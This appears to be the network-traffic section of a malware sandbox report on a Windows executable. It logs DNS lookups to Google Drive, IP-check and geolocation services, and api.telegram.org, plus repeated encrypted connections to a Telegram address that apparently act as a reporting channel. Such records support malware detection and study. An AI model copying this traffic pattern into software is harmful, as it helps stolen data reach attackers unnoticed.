                                                                                                                    Jan 11, 2025 07:24:47.160439014 CET44350054149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:47.160641909 CET44350054149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:47.160707951 CET50054443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:47.161029100 CET50054443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:47.164892912 CET5005380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:47.166115999 CET5005580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:47.169974089 CET8050053193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:47.170059919 CET5005380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:47.170983076 CET8050055193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:47.171060085 CET5005580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:47.171161890 CET5005580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:47.177661896 CET8050055193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:48.144056082 CET8050055193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:48.145528078 CET50056443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:48.145570040 CET44350056149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:48.145664930 CET50056443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:48.145955086 CET50056443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:48.145976067 CET44350056149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:48.185512066 CET5005580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:48.785193920 CET44350056149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:48.787429094 CET50056443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:48.787456036 CET44350056149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:48.787560940 CET50056443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:48.787566900 CET44350056149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.081020117 CET44350056149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.081095934 CET44350056149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.081172943 CET50056443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:49.081649065 CET50056443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:49.084645033 CET5005580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:49.085916996 CET5005780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:49.089576960 CET8050055193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.089653969 CET5005580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:49.090646982 CET8050057193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.090711117 CET5005780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:49.090821981 CET5005780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:49.096013069 CET8050057193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.716588974 CET8050057193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.723318100 CET50058443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:49.723361015 CET44350058149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.723447084 CET50058443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:49.723706007 CET50058443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:49.723721981 CET44350058149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:49.763643980 CET5005780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:50.346640110 CET44350058149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:50.348965883 CET50058443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:50.348999977 CET44350058149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:50.349179029 CET50058443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:50.349186897 CET44350058149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:50.562974930 CET44350058149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:50.563045025 CET44350058149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:50.563119888 CET50058443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:50.563628912 CET50058443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:50.567373037 CET5005780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:50.568176031 CET5005980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:50.572616100 CET8050057193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:50.573208094 CET5005780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:50.574119091 CET8050059193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:50.574187040 CET5005980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:50.574296951 CET5005980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:50.579252958 CET8050059193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:51.204070091 CET8050059193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:51.206513882 CET50060443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:51.206562042 CET44350060149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:51.206638098 CET50060443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:51.206975937 CET50060443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:51.206991911 CET44350060149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:51.248083115 CET5005980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:51.817965031 CET44350060149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:51.822062016 CET50060443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:51.822089911 CET44350060149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:51.822154999 CET50060443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:51.822164059 CET44350060149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:52.212805033 CET44350060149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:52.212883949 CET44350060149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:52.212986946 CET50060443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:52.242337942 CET50060443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:52.247015953 CET5005980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:52.248044014 CET5006180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:52.266983986 CET8050061193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:52.267261028 CET5006180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:52.270922899 CET5006180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:52.274068117 CET8050059193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:52.274156094 CET5005980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:52.275738955 CET8050061193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:53.232875109 CET8050061193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:53.234632969 CET50062443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:53.234678984 CET44350062149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:53.234766960 CET50062443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:53.235163927 CET50062443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:53.235176086 CET44350062149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:53.279335976 CET5006180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:53.872270107 CET44350062149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:53.875288010 CET50062443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:53.875304937 CET44350062149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:53.875371933 CET50062443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:53.875380993 CET44350062149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.266159058 CET44350062149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.266323090 CET44350062149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.266567945 CET50062443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:54.267095089 CET50062443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:54.270770073 CET5006180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:54.271909952 CET5006380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:54.275801897 CET8050061193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.276706934 CET8050063193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.276824951 CET5006180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:54.276849985 CET5006380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:54.277167082 CET5006380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:54.282001972 CET8050063193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.903897047 CET8050063193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.951323032 CET5006380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:54.993385077 CET50064443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:54.993443966 CET44350064149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:54.993556023 CET50064443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:54.997816086 CET50064443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:54.997839928 CET44350064149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:55.612932920 CET44350064149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:55.614892960 CET50064443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:55.614922047 CET44350064149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:55.615067959 CET50064443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:55.615073919 CET44350064149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:56.121094942 CET44350064149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:56.121179104 CET44350064149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:56.121284962 CET50064443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:56.121973038 CET50064443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:56.126394033 CET5006380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:56.127607107 CET5006580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:56.131452084 CET8050063193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:56.131571054 CET5006380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:56.132368088 CET8050065193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:56.132458925 CET5006580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:56.132576942 CET5006580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:56.137353897 CET8050065193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:57.528477907 CET8050065193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:57.530136108 CET50066443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:57.530200005 CET44350066149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:57.530277967 CET50066443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:57.530580997 CET50066443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:57.530599117 CET44350066149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:57.576344013 CET5006580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:58.135571003 CET44350066149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:58.137789965 CET50066443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:58.137815952 CET44350066149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:58.137868881 CET50066443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:58.137878895 CET44350066149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:58.424531937 CET44350066149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:58.424609900 CET44350066149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:58.424777985 CET50066443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:58.425611973 CET50066443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:58.429389954 CET5006580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:58.430808067 CET5006780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:58.434391975 CET8050065193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:58.434495926 CET5006580192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:58.435633898 CET8050067193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:58.435728073 CET5006780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:58.435825109 CET5006780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:58.440629005 CET8050067193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.092860937 CET8050067193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.108793974 CET50068443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:59.108848095 CET44350068149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.108944893 CET50068443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:59.109217882 CET4981680192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:59.109584093 CET50068443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:59.109601974 CET44350068149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.138818026 CET5006780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:59.722229958 CET44350068149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.729645014 CET50068443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:59.729676962 CET44350068149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.729744911 CET50068443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:59.729756117 CET44350068149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.947499037 CET44350068149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.947681904 CET44350068149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.947788000 CET50068443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:59.948225975 CET50068443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:24:59.951731920 CET5006780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:59.952847958 CET5006980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:59.956672907 CET8050067193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.956743002 CET5006780192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:59.957628965 CET8050069193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:59.957701921 CET5006980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:59.957814932 CET5006980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:24:59.962543011 CET8050069193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:01.718718052 CET8050069193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:01.720290899 CET50070443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:01.720356941 CET44350070149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:01.720454931 CET50070443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:01.720803022 CET50070443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:01.720824957 CET44350070149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:01.763871908 CET5006980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:02.356122017 CET44350070149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:02.358124971 CET50070443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:02.358170033 CET44350070149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:02.358258963 CET50070443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:02.358268023 CET44350070149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:02.687109947 CET44350070149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:02.687351942 CET44350070149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:02.687468052 CET50070443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:02.691664934 CET50070443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:02.712093115 CET5006980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:02.713099003 CET5007180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:02.717003107 CET8050069193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:02.717080116 CET5006980192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:02.717845917 CET8050071193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:02.717926025 CET5007180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:02.718065023 CET5007180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:02.722794056 CET8050071193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:09.606848955 CET8050071193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:09.608819008 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:09.608854055 CET44350072149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:09.608935118 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:09.609249115 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:09.609260082 CET44350072149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:09.654485941 CET5007180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:10.262428045 CET44350072149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:10.310720921 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:12.622302055 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:12.622315884 CET44350072149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:12.622437954 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:12.622446060 CET44350072149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:13.006077051 CET44350072149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:13.006189108 CET44350072149.154.167.220192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:13.006294012 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:13.006870985 CET50072443192.168.2.4149.154.167.220
                                                                                                                    Jan 11, 2025 07:25:13.009816885 CET5007180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:13.010929108 CET5007380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:13.014878988 CET8050071193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:13.014978886 CET5007180192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:13.015724897 CET8050073193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:13.015800953 CET5007380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:13.015896082 CET5007380192.168.2.4193.122.6.168
                                                                                                                    Jan 11, 2025 07:25:13.020693064 CET8050073193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:14.402019024 CET8050073193.122.6.168192.168.2.4
                                                                                                                    Jan 11, 2025 07:25:14.451390028 CET5007380192.168.2.4193.122.6.168
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 11, 2025 07:23:53.720627069 CET5624453192.168.2.41.1.1.1
                                                                                                                    Jan 11, 2025 07:23:53.727221966 CET53562441.1.1.1192.168.2.4
                                                                                                                    Jan 11, 2025 07:23:54.962833881 CET5763153192.168.2.41.1.1.1
                                                                                                                    Jan 11, 2025 07:23:54.970412970 CET53576311.1.1.1192.168.2.4
                                                                                                                    Jan 11, 2025 07:23:59.171855927 CET6202353192.168.2.41.1.1.1
                                                                                                                    Jan 11, 2025 07:23:59.178694963 CET53620231.1.1.1192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:00.899852991 CET5729353192.168.2.41.1.1.1
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET53572931.1.1.1192.168.2.4
                                                                                                                    Jan 11, 2025 07:24:07.591741085 CET6099353192.168.2.41.1.1.1
                                                                                                                    Jan 11, 2025 07:24:07.598730087 CET53609931.1.1.1192.168.2.4
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Jan 11, 2025 07:23:53.720627069 CET192.168.2.41.1.1.10x2008Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:54.962833881 CET192.168.2.41.1.1.10xae98Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:59.171855927 CET192.168.2.41.1.1.10xfe5bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.899852991 CET192.168.2.41.1.1.10xb30Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:07.591741085 CET192.168.2.41.1.1.10xaec0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Jan 11, 2025 07:23:53.727221966 CET1.1.1.1192.168.2.40x2008No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:54.970412970 CET1.1.1.1192.168.2.40xae98No error (0)drive.usercontent.google.com142.250.185.225A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:59.178694963 CET1.1.1.1192.168.2.40xfe5bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:59.178694963 CET1.1.1.1192.168.2.40xfe5bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:59.178694963 CET1.1.1.1192.168.2.40xfe5bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:59.178694963 CET1.1.1.1192.168.2.40xfe5bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:59.178694963 CET1.1.1.1192.168.2.40xfe5bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:23:59.178694963 CET1.1.1.1192.168.2.40xfe5bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET1.1.1.1192.168.2.40xb30No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET1.1.1.1192.168.2.40xb30No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET1.1.1.1192.168.2.40xb30No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET1.1.1.1192.168.2.40xb30No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET1.1.1.1192.168.2.40xb30No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET1.1.1.1192.168.2.40xb30No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:00.907324076 CET1.1.1.1192.168.2.40xb30No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 07:24:07.598730087 CET1.1.1.1192.168.2.40xaec0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                    • drive.google.com
                                                                                                                    • drive.usercontent.google.com
                                                                                                                    • reallyfreegeoip.org
                                                                                                                    • api.telegram.org
                                                                                                                    • checkip.dyndns.org
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449754193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:23:59.187527895 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:23:59.817672014 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:23:59 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                    Jan 11, 2025 07:23:59.821974039 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Jan 11, 2025 07:24:00.008609056 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:23:59 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
